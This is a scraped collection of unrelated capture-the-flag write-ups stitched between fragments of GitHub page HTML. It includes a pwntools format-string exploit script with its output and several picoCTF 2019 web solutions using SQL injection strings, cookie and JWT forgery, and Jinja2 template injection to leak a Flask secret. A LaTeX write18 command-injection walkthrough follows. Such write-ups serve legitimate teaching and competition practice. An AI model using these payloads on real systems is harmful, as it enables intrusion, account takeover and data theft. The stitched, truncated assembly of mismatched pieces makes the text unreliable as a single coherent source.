<div class="d-flex flex-justify-center pb-6"> <span></span> </div></footer>
<div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> You can’t perform that action at this time. </div>
<div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template>
<div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div>
<template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none m-2"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> </clipboard-copy> </div></template>
</div>
<div id="js-global-screen-reader-notice" class="sr-only" aria-live="polite" ></div> </body></html>
|
### Explanation
Basic idea: copy the secret (4 bytes) from the stack to our guess variable (also on the stack) and pass the check.
- `%<N>d` normally this lets us print N characters total (a decimal int padded to N spaces). - `%*25$d` the asterisk lets us choose the value for N from the stack, so we choose 25$, which is the position of the secret value: this will therefore print a number of chars equal to the secret value. - `%16$n` this will then write the number of printed chars to our variable on the stack (position 16) that is later compared with the secret.
Final format string: `%*25$d%16$n`. This will print *A LOT* of characters back (like 1GB of spaces), but works after trying a few times and getting a small secret value.
### Code
#!/usr/bin/env python2 # Author: Marco Bonelli - @mebeim # Date : 2020-04-04 # https://gist.github.com/mebeim/f74504ec20399ecb9384f826391f7598
from pwn import *
HOST = 'pwn4-01.play.midnightsunctf.se' PORT = 10004 EXE = './pwn4'
if args.REMOTE: r = remote(HOST, PORT) else: r = process(EXE)
r.recvuntil("user: ") r.sendline("%*25$d%16$n") r.recvuntil("code: ") r.sendline(str(10)) r.recvuntil("logged: ")
tot = 0 p = log.progress('Receiving all data') log.info('Press CTRL+C to switch to interactive...');
while 1: try: data = r.recv(1000 * 1000) tot += len(data) p.status('%d MB', tot/1e6) except: break
p.success('done (%d MB)', tot/1e6) r.interactive()
### Output
[+] Opening connection to pwn4-01.play.midnightsunctf.se on port 10004: Done [+] Receiving all data: done (1 MB) [*] Press CTRL+C to switch to interactive... [*] Switching to interactive mode $ cat flag midnight{12_pwny_men_33269c083256f5f3} $ [*] Interrupted [*] Closed connection to pwn4-01.play.midnightsunctf.se port 10004 |
# picoCTF 2019 Web Challenges
---
## Inspector(50)
### Problem
> Kishor Balan tipped us off that the following code may need inspection: `https://2019shell1.picoctf.com/problem/61676/` ([link](https://2019shell1.picoctf.com/problem/61676/)) or http://2019shell1.picoctf.com:61676
### Hints
> How do you inspect web code on a browser?>> There's 3 parts
### Solution
Visiting the website, we right click and choose to view source code, getting the first third of the flag, included as a html comment:
```html
```
The second part of the flag comes from the referenced CSS file [mycss.cs](https://2019shell1.picoctf.com/problem/61676/mycss.css):
```CSS/* You need CSS to make pretty pages. Here's part 2/3 of the flag: t3ct1ve_0r_ju5t */```
The last part comes from the Javascript scipt [myjs.js](https://2019shell1.picoctf.com/problem/61676/myjs.js):
```javascript/* Javascript sure is neat. Anyways part 3/3 of the flag: _lucky?1638dbe7} */```
Hence combining the 3 parts gives the flag:
`picoCTF{tru3_d3t3ct1ve_0r_ju5t_lucky?1638dbe7}`
## dont-use-client-side(100)
### Problem
> Can you break into this super secure portal? `https://2019shell1.picoctf.com/problem/49886/` ([link](https://2019shell1.picoctf.com/problem/49886/)) or http://2019shell1.picoctf.com:49886
### Hints
> Never trust the client
### Solution
Opening the website greets us with a 'login' page, requiring credentials. As referenced by the problem name, we assume that the check for the validity of the credentials is checked locally, and hence can be reversed to obtain the correct password. Checking the html source code gives us:
```html<script type="text/javascript"> function verify() { checkpass = document.getElementById("pass").value; split = 4; if (checkpass.substring(0, split) == 'pico') { if (checkpass.substring(split*6, split*7) == 'e2f2') { if (checkpass.substring(split, split*2) == 'CTF{') { if (checkpass.substring(split*4, split*5) == 'ts_p') { if (checkpass.substring(split*3, split*4) == 'lien') { if (checkpass.substring(split*5, split*6) == 'lz_e') { if (checkpass.substring(split*2, split*3) == 'no_c') { if (checkpass.substring(split*7, split*8) == '4}') { alert("Password Verified") } } } } } } } } else { alert("Incorrect password"); } }</script>```
The checkpass variable holds our input, and the each substring method in this case gets us *split*(set to 4) number of characters starting from the first argument to the method. We assemble the credentials, and hence the flag, accordingly:
`picoCTF{no_clients_plz_ee2f24}`
## logon(100)
### Problem
> The factory is hiding things from all of its users. Can you login as logon and find what they've been looking at? `https://2019shell1.picoctf.com/problem/32270/` ([link](https://2019shell1.picoctf.com/problem/32270/)) or http://2019shell1.picoctf.com:32270
### Hints
> Hmm it doesn't seem to check anyone's password, except for {{name}}'s?
### Solution
No matter what credentials we use for the login, it successfully logs us in but doesn't give us the flag. This suggests that a cookie might be used to store a separate variable that might be preventing us from seeing the flag. Sure enough, we notice an admin cookie set to `False`. Changing this to `True` and refreshing the page gives us the flag:
`picoCTF{th3_c0nsp1r4cy_l1v3s_a03e3590}`
## where are the robots(100)
### Problem
> Can you find the robots? `https://2019shell1.picoctf.com/problem/21868/` ([link](https://2019shell1.picoctf.com/problem/21868/)) or http://2019shell1.picoctf.com:21868
### Hints
> What part of the website could tell you where the creator doesn't want you to look?
### Solution
This challenge references [a file that gives instructions to web crawlers](https://www.robotstxt.org/robotstxt.html), called robots.txt. Visiting https://2019shell1.picoctf.com/problem/21868/robots.txt, we see
```htmlUser-agent: *Disallow: /e0779.html```
Visiting https://2019shell1.picoctf.com/problem/21868/e0779.html now, we get our flag:
`picoCTF{ca1cu1at1ng_Mach1n3s_e0779}`
## Client-side-again(200)
### Problem
> Can you break into this super secure portal? `https://2019shell1.picoctf.com/problem/37886/` ([link](https://2019shell1.picoctf.com/problem/37886/)) or http://2019shell1.picoctf.com:37886
### Hints
> What is obfuscation?
### Solution
Visiting the website, we are greeted by a page similar to [dont-use-client-side](#dont-use-client-side100). We thus check the source code of the website again, getting an obfuscation Javascript script:
```html<script type="text/javascript"> var _0x5a46=['9d025}','_again_3','this','Password\x20Verified','Incorrect\x20password','getElementById','value','substring','picoCTF{','not_this'];(function(_0x4bd822,_0x2bd6f7){var _0xb4bdb3=function(_0x1d68f6){while(--_0x1d68f6){_0x4bd822['push'](_0x4bd822['shift']());}};_0xb4bdb3(++_0x2bd6f7);}(_0x5a46,0x1b3));var _0x4b5b=function(_0x2d8f05,_0x4b81bb){_0x2d8f05=_0x2d8f05-0x0;var _0x4d74cb=_0x5a46[_0x2d8f05];return _0x4d74cb;};function verify(){checkpass=document[_0x4b5b('0x0')]('pass')[_0x4b5b('0x1')];split=0x4;if(checkpass[_0x4b5b('0x2')](0x0,split*0x2)==_0x4b5b('0x3')){if(checkpass[_0x4b5b('0x2')](0x7,0x9)=='{n'){if(checkpass[_0x4b5b('0x2')](split*0x2,split*0x2*0x2)==_0x4b5b('0x4')){if(checkpass[_0x4b5b('0x2')](0x3,0x6)=='oCT'){if(checkpass[_0x4b5b('0x2')](split*0x3*0x2,split*0x4*0x2)==_0x4b5b('0x5')){if(checkpass['substring'](0x6,0xb)=='F{not'){if(checkpass[_0x4b5b('0x2')](split*0x2*0x2,split*0x3*0x2)==_0x4b5b('0x6')){if(checkpass[_0x4b5b('0x2')](0xc,0x10)==_0x4b5b('0x7')){alert(_0x4b5b('0x8'));}}}}}}}}else{alert(_0x4b5b('0x9'));}}</script>```
We however, notice the array at the very start, containg a few strings, including some that might be a part of the flag, such as `'picoCTF'` and `'not_this'`. Excluding the error.success/html strings, we are left with `'picoCTF{'`, `'not_this'`, `'_again_3'`, and `'9d025}'`. We try assembling these pieces, we get the flag.
`picoCTF{not_this_again_39d025}`
## Open-to-admins(200)
### Problem
> This secure website allows users to access the flag only if they are **admin** and if the **time** is exactly 1400. `https://2019shell1.picoctf.com/problem/21882/` ([link](https://2019shell1.picoctf.com/problem/21882/)) or http://2019shell1.picoctf.com:21882
### Hints
> Can cookies help you to get the flag?
Visiting the website and clicking `Flag` tells us that we are not the admin, or it;s the incorrect time. From the challenge prompt, we know we need to be admin, and the time needs to be 1400. As hinted, we make a cookie named `Admin` with the value `True`, as seen in [logon](#logon100), and make a `Time` cookie with the value `1400`. Now clicking `Flag` gives us the flag:
`picoCTF{0p3n_t0_adm1n5_b6ea8359}`
## picobrowser(200)
### Problem
> This website can be rendered only by **picobrowser**, go and catch the flag! `https://2019shell1.picoctf.com/problem/37829/` ([link](https://2019shell1.picoctf.com/problem/37829/)) or http://2019shell1.picoctf.com:37829
### Hints
> You dont need to download a new web browser
### Solution
Clicking `Flag` tells us that we are not picobrowser, and then gives us our current [user agent](https://www.wikiwand.com/en/User_agent):

We can use an extension such as [User-Agent Switcher](https://chrome.google.com/webstore/detail/user-agent-switcher/lkmofgnohbedopheiphabfhfjgkhfcgf) on Google Chrome, to manually input our desired user agent. We use picobrowser as suggested and get the flag:
`picoCTF{p1c0_s3cr3t_ag3nt_7e9c671a}`
## Irish-Name-Repo 1(300)
### Problem
> There is a website running at `https://2019shell1.picoctf.com/problem/47253/` ([link](https://2019shell1.picoctf.com/problem/47253/)) or http://2019shell1.picoctf.com:47253. Do you think you can log us in? Try to see if you can login!
### Hints
> There doesn't seem to be many ways to interact with this, I wonder if the users are kept in a database?>> Try to think about how does the website verify your login?
### Solution
The hint seems to suggest the use of [SQL injection](https://www.owasp.org/index.php/SQL_Injection), hence we start off by trying simple payloads:
```username: admin' --password: password(this field does not matter as it is commented out)```
This gives us the flag:
`picoCTF{s0m3_SQL_93e76603}`
## Irish-Name-Repo 2(350)
### Problem
> There is a website running at `https://2019shell1.picoctf.com/problem/60775/` ([link](https://2019shell1.picoctf.com/problem/60775/)). Someone has bypassed the login before, and now it's being strengthened. Try to see if you can still login! or http://2019shell1.picoctf.com:60775
### Hints
> The password is being filtered.
We start off by trying the same input as [Irish Name Repo 1](#irish-name-repo-1300):
```username: admin' --password: password(this field does not matter as it is commented out)```
This surprisingly gives us the flag as well!
`picoCTF{m0R3_SQL_plz_015815e2}`
With the hint to this challenge, I assume that Repo 1 was meant to be solved with an OR injection or something of the *like*.
## Irish-Name-Repo 3(400)
### Problem
> There is a secure website running at `https://2019shell1.picoctf.com/problem/47247/` ([link](https://2019shell1.picoctf.com/problem/47247/)) or http://2019shell1.picoctf.com:47247. Try to see if you can login as admin!
### Hints
> Seems like the password is encrypted.
Since the password is hinted to be encrypted, we first check the page source for any signs of encryption to the input, however, do not see any. This means the encryption must be taking place server side.
We want to leak the encryption method somehow, so we open [BurpSuite](https://portswigger.net/burp/communitydownload) to monitor the requests made to the site. We input some string(i.e. `abcdefghijklmnopqrstuvwxyz`) and submit the request. In BurpSuite, we notice a `debug` parameter, originally set to `0`.

We change this to a `1`, and forward the request. Now in addition to the `Login failed` page, we get some debug info:

The 'encryption' method used is just [ROT13](https://www.wikiwand.com/en/ROT13)! We can thus craft our payloads normally, just running it through a ROT13 converter before sending it through.
We utilise a simple payload that escapes the string and always evaluates to true:
`' OR 1=1 --`
'Encrypting' it, we get:
`' BE 1=1 --`
Submitting this as the input, we get our flag:
`picoCTF{3v3n_m0r3_SQL_c2c37f5e}`
## Empire 1(400)
### Problem
> Psst, Agent 513, now that you're an employee of Evil Empire Co., try to get their secrets off the company website. `https://2019shell1.picoctf.com/problem/4155/` ([link](https://2019shell1.picoctf.com/problem/4155/)) Can you first find the secret code they assigned to you? or http://2019shell1.picoctf.com:4155
### Hints
> Pay attention to the feedback you get>> There is *very* limited filtering in place - this to stop you from breaking the challenge for yourself, not for you to bypass.>> The database gets reverted every 2 hours if you do break it, just come back later
### Solution
*TODO*
## JaWT Scratchpad(400)
### Problem
> Check the admin scratchpad! `https://2019shell1.picoctf.com/problem/45158/` or http://2019shell1.picoctf.com:45158
### Hints
> What is that cookie?>> Have you heard of JWT?
We first enter the website with some username, and notice that we have been issued a `jwt` cookie. This is a [JSON Web Token](https://jwt.io/introduction/). We can also [decode](https://jwt.io/#debugger) our token, where we see the payload to be:
```javascript{ "user": "john"}```
We would obviously like to change the user to admin, however, to encode this, require the secret key. Under the section `Register with your name!`, a hyperlink linking to the JohnTheRipper tool's GitHub page suggests a brute force method is required. Instead of using JohnTheRipper, I chose to use this [jwt-cracker](https://github.com/lmammino/jwt-cracker). Letting it run for a while, I get the secret, `ilovepico`. Using the debugger tool on [jwt.io](jwt.io), we get the cookie to be injected:
`eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiYWRtaW4ifQ.gtqDl4jVDvNbEe_JYEZTN19Vx6X9NNZtRVbKPBkhO-s`
Injecting this as the cookie and refreshing the page gives us the flag:
`picoCTF{jawt_was_just_what_you_thought_d571d8aa3163f61c144f6d505ef2919b}`
## Java Script Kiddie(400)
### Problem
> The image link appears broken... https://2019shell1.picoctf.com/problem/10188 or http://2019shell1.picoctf.com:10188
### Hints
> This is only a JavaScript problem.
### Solution
Looking at the source code of the website, we see a script that seems to be constructing our image by manipulating some values in an array named "bytes", and our input, otherwise called key in the code.

We get the bytes array through the browser console:

The script seems to be doing
> 1. Use the input as the key> 2. For each number in the key, convert the string to the actual number(char()-48), store it in variable `i`> 3. Get the byte value for the resultant PNG at position (i , j), by the following formula:
```javascriptfor(var j = 0; j < (bytes.length / LEN); j ++){ result[(j * LEN) + i] = bytes[(((j + shifter) * LEN) % bytes.length) + i]}```
> 4. Remove all trailing zeros from the file> 5. Use the result as the source for the PNG displayed on the page
Looking at the [file signature](https://www.garykessler.net/library/file_sigs.html) for a PNG file, we see that the first 8 bytes of the file have to be `89 50 4E 47 0D 0A 1A 0A`, and the trailing 8 bytes have to be `49 45 4E 44 AE 42 60 82`. We can thus write a python script to find us possible values for the first 8 digits of the key using the header, and the last 8 digits using the trailer, giving us the final key.
For the first 8 digits:
```pythonbyte_list = [61,180,159,7,201,26,191,...]png_header = [0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A]print 'First 8 digits:'for head in range(8): for i in xrange(len(byte_list)): if byte_list[i] == png_header[head]: if (i-head)%16 ==0: print (i-head)/16,```
This gives us the first 8 digits - `74478291`.
For the last 8 digits, the actual result might include a bunch of 0s at the end, instead of the actual trailer, as we see that the javascript script actually does work to remove these just before the image is used as a source. We thus try our luck with the ending being `00 00 00 00 00 00 00 00` first, as we notice multiple 0s in the bytes array, leading us to believe that some of these might actually be at the end. We get a list of possible numbers for the last 8 digits of the key with this script:
```pythoncount = 0png_trailer = [0,0,0,0,0,0,0,0]print ''print 'Possibilities for the last 8 digits:'for head in range(8): for i in xrange(len(byte_list)): if byte_list[i] == png_trailer[head]: if (i-head-8)%16 ==0 and (i-head-8)/16<10: print (i-head+1)/16, print 'Digit '+ str(count) count += 1```
We then use the following to iterate through the combination possibilities:
```pythonfirst = ['0']second = ['8','9']third = ['0','1','2']fourth = ['1','3','4']fifth = ['3','5','6']sixth = ['2','4']seventh = ['9']eighth = ['6']arr =[first,second,third,fourth,fifth,sixth, seventh,eighth]trailer_combi = list(itertools.product(*arr))
header = '74478291'count=0
print '\n\nPossible keys, check output files:'for possible_tail in trailer_combi: key = header+''.join(possible_tail) result=[0]*688 for i in xrange(16): shifter = int(key[i]) for j in xrange(43): result[(j * 16) + i] = byte_list[(((j + shifter) * 16) % 688) + i] while not result[-1]: result.pop() if result[-8:] == png_trailer: print key f = open('output'+str(count), 'wb') f.write(bytearray(result)) count +=1```
We use the command `pngcheck output*`, and notice that `output0` gives OK. We open it and see a qr code, whcih we use `zbarimg` to decode to get the flag:
`picoCTF{9e627a851b332d57435b6c32d7c2d4af}`
## Empire2(450)
### Problem
> Well done, Agent 513! Our sources say Evil Empire Co is passing secrets around when you log in: `https://2019shell1.picoctf.com/problem/39830/` ([link](https://2019shell1.picoctf.com/problem/39830/)), can you help us find it? or http://2019shell1.picoctf.com:39830
### Hints
> Pay attention to the feedback you get>> There is *very* limited filtering in place - this to stop you from breaking the challenge for yourself, not for you to bypass.>> The database gets reverted every 2 hours if you do break it, just come back later
### Solution
We create an account and log in, noticing that there is a flask session cookie. [Decoding](https://www.kirsle.net/wizards/flask-session.cgi) the cookie gives us:
```javascript{ "_fresh": true, "_id": "8cd7ed88b8f2634ebe13cbb6c321c3090c11254effbb99924bf9037639c9fda127643b8e1c4ba5257fce7a193639ae2f5e2911ece327e48e43b386ef65618709", "csrf_token": "bf1d1303f409590730443f12541c77cdb97811e8", "dark_secret": "picoCTF{its_a_me_your_flag3f43252e}", "user_id": "3"}```
The cookie includes the flag:
`picoCTF{its_a_me_your_flag3f43252e}`
## Java Script Kiddie 2(450)
### Problem
> The image link appears broken... twice as badly... https://2019shell1.picoctf.com/problem/21890 or http://2019shell1.picoctf.com:21890
### Hints
> This is only a JavaScript problem.
### Solution
*TODO* but extremely similar to [JS Kiddie](#java-script-kiddie400). It is now a 32 digit key, however, only alternate digits matter so code similar to [JS Kiddie](#java-script-kiddie400) can be used here to get the results QR code. Decoding it gives the flag:
`picoCTF{e1f443bfe40e958050e0d74aec4daa48}`
## cereal hacker 1(450)
### Problem
> Login as admin. https://2019shell1.picoctf.com/problem/47283/ or http://2019shell1.picoctf.com:47283
### Solution
*TODO*, but is a simple cookie SQLi, with initial login as guest/guest.
## Empire3(500)
### Problem
> Agent 513! One of your dastardly colleagues is laughing very sinisterly! Can you access his todo list and discover his nefarious plans? `https://2019shell1.picoctf.com/problem/47271/` ([link](https://2019shell1.picoctf.com/problem/47271/)) or http://2019shell1.picoctf.com:47271
### Hints
> Pay attention to the feedback you get>> There is *very* limited filtering in place - this to stop you from breaking the challenge for yourself, not for you to bypass.>> The database gets reverted every 2 hours if you do break it, just come back later
### Solution
Similarly to [Empire2](#empire2450), we can decode the cookie, and we see that we now need to edit the cookie to user id 1 or 2, both of which seem to be admin. However, to encrypt the data back into a usable cookie, we need to sign it with a secret.
Going into the `Add a Todo` page and inputting `{{config}}`, we can see all the items under the flask configuration of the website. This utilises a [Server Side Template Injection(SSTI)](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection), specifically a vulnerability in the Jinja2 template that Flask uses.
Now viewing `Your Todos`, we get the `secret_key`, `'11e524344575850af46c19681f9baa0d'`.
Now we can use a [flask cookie encoder](https://github.com/Paradoxis/Flask-Unsign) to generate our desired cookie.
```shellflask-unsign --sign --cookie "{'_fresh': True, '_id': 'da00c2f44206c588ee050cd3e467e96d1ccfbd7f121c497442c70e7e7ad0cd08c1f7c8e967301b5beb1740d0c35dc5cc9ff421d0c0914a30a91364c5e35bc294', 'csrf_token': 'ab946d3f256cc7eafed0821f8a70aa18c63f620b', 'user_id': '2'}" --secret '11e524344575850af46c19681f9baa0d'```
Injecting the output as the cookie and going into `Your Todos`, we get the flag:
`picoCTF{cookies_are_a_sometimes_food_404e643b}`
## cereal hacker 2(500)
### Problem
>Get the admin's password. https://2019shell1.picoctf.com/problem/62195/ or http://2019shell1.picoctf.com:62195
### Solution
*TODO*, but was essentially using a PHP filter wrapper to leak source code, get credentials to a mySQL server running on the picoCTF shell localhost, logging in, and doing a blind SQLi to get admin's password, which was also the flag
Flag:
`picoCTF{c9f6ad462c6bb64a53c6e7a6452a6eb7}`
|
# PDFMAX
* This is what happend! I typed this command to connect `nc jh2i.com 50029`, and read this line > pdfmax is an online cloud LaTeX interpreter.
I have developed one website for my university, in which users can add multiple textbox, images and it will create PDF from LaTeX. I wanted to make it secure so I did some research. And found that by using LaTeX tags, we can read internal files, execute commands!

* We can use `immediate\write18{ COMMAND_HERE }`, and compile the LaTeX, we can see the command output in the logs. * Test for command execution * Select 2nd option to create latex file. ```latex \documentclass{article} \begin{document} immediate\write18{ls} \end{document} |0| ``` * Now choose 3rd option to compile it, and you can see the output in the logs. 
* Then we just need to run `cat flag.txt` to get the flag. ```latex \documentclass{article} \begin{document} \immediate\write18{cat flag.txt} \end{document} |0| ``` 
> ### LLS{write18_my_flag_down_immmediately} |
It's PWN but in OSINT hmm...Googled something like `"get-access" + ctf`and found writeup for [DefCampCTF](https://nytr0gen.github.io/writeups/ctf/2019/09/09/defcamp-ctf-quals-2019.html#get-access-101p-pwnrev). Flag from writeup is flag for task: `DCTF{BD8C664E74EB942225EFB74CFD76EC4B2FDA0C37A2D567B707AA1407781FF77F}` |
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com">
<link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-fe3f886b577a.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-a1dbeda2886c.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-1ad5cf51dfeb.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-11d3505dc06a.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-8b800495504f.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-daa38c88b795.css" /><link data-color-theme="light_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-1b9ea565820a.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-e4be9332dd6c.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_tritanopia-0dcf95848dd5.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-c581c4e461bb.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-0e278d45156f.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/github-dcaf0f44dbb1.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/code-26709f54a08d.css" />
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wp-runtime-774bfe5ae983.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-327bbf-0aaeb22dd2a5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_soft-nav_soft-nav_ts-21fc7a4a0e8f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-e059fd03252f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-2646a2c533e3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-63debe-c04540d458d4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-b9368a9cb79e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_fzy_js_index_js-node_modules_github_markdown-toolbar-element_dist_index_js-e3de700a4c9d.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-6afc16-e779583c369f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_text-ex-3415a8-7ecc10fb88d0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-79182d-befd2b2f5880.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_view-components_app_components_primer_primer_js-node_modules_gith-6a1af4-df3bc95b06d3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-fc0e0b89822a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-1641411db24a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-9d9fe1859ce5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-4140d67f0cc2.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2-424aa982deef.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" 